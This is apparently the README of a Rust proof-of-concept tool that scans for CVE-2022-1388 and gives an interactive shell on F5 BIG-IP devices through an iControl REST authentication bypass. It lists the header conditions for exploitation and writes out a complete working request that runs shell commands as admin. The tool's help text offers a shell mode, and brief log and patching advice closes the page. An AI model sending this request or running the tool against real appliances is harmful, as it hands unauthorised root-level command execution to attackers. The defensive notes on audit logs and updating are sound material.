Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust
To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerability:
- Connection header must include X-F5-Auth-Token
- X-F5-Auth-Token header must be present
- Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host
- Auth header must be set with the admin username and any password
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
"command":"run",
"utilCmdArgs":"-c id"
}
- You can find the lab Here
$ cve_2022_1308_rs -h
CVE-2022-1388 PoC 1.0
Petruknisme <me@petruknisme.com>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust
USAGE:
cve_2022_1388_rs [OPTIONS] --url <URL>
OPTIONS:
-h, --help Print help information
-s, --shell This mode for accessing payload with interactive shell
-u, --url <URL> F5 Big-IP target url
-V, --version Print version information
- Rust
- Cargo
IOCs can be found in the /var/log/audit log file. Unrecognized commands executed by the mgmt/tm/util/bash endpoint should be cause for concern.
Update to the latest version or mitigate by following the instructions within the F5 Security Advisory